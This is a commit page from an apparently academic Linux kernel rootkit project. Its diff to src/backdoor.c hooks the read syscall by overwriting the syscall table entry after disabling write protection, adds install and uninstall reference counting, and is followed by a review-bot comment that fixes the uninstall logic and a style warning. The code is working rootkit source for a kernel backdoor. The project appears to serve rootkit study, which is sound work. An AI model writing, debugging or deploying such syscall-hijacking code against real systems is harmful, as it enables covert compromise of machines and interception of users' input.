linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit b19cc27f9a6cafa8c41ac305443837f10a4d3007
parent 710e182d6e60a347d80e604f5adae38fe9c782ee
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 29 Nov 2020 18:25:38 +0100

Merge branch 'master' of github.com:deurzen/rootkit-programming-dev

Diffstat:
Msrc/backdoor.c | 28+++++++++++++++++-----------
1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -16,9 +16,11 @@ int (*current_receive_buf2)(struct tty_struct *, const unsigned char *, char *,
 void
 backdoor_read(void)
 {
- disable_protection();
- sys_calls[__NR_read] = (void *)g7_read;
- enable_protection();
+ if (atomic_inc_return(&read_install_count) == 1) {
+ disable_protection();
+ sys_calls[__NR_read] = (void *)g7_read;
+ enable_protection();
+ }
 }
 
 void
@@ -54,16 +56,20 @@ unbackdoor(void)
 tty = NULL;
 }
 
- if (sys_read) {
- disable_protection();
- sys_calls[__NR_read] = (void *)sys_read;
- enable_protection();
+ if (atomic_dec_return(&read_install_count) < 0) {
+ atomic_set(&read_install_count, 0);
+
+ if (sys_read) {
+ disable_protection();
+ sys_calls[__NR_read] = (void *)sys_read;
+ enable_protection();
 
- int cur;
+ int cur;
 
- while ((cur = atomic_read(&read_count)) > 0) {
- DEBUG_INFO("Waiting for %d tasks", cur);
- msleep(250);
+ while ((cur = atomic_read(&read_count)) > 0) {
+ DEBUG_INFO("Waiting for %d tasks", cur);
+ msleep(250);
+ }
 }
 }
 }
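Review bot: In the second hunk the uninstall test does not mirror the install test: backdoor_read() takes the install path when atomic_inc_return() returns 1, but unbackdoor() only restores the saved sys_read entry when atomic_dec_return() returns a negative value, so after one balanced backdoor_read()/unbackdoor() pair the counter reads 0, the branch is skipped and the original __NR_read entry stays replaced until unbackdoor() is called a second time (assuming the counter starts at zero; its initializer is not in this diff). Changing the condition to `if (atomic_dec_return(&read_install_count) <= 0) {` keeps install and uninstall balanced while the existing atomic_set() still clamps an over-decremented count back to zero. unbackdoor() begins before this hunk, so the first part of the teardown is not visible here. Minor style point: `int cur;` now follows statements inside the new block, which -Wdeclaration-after-statement (enabled by the kernel build) warns about; declaring it at the top of the block or the function avoids the warning.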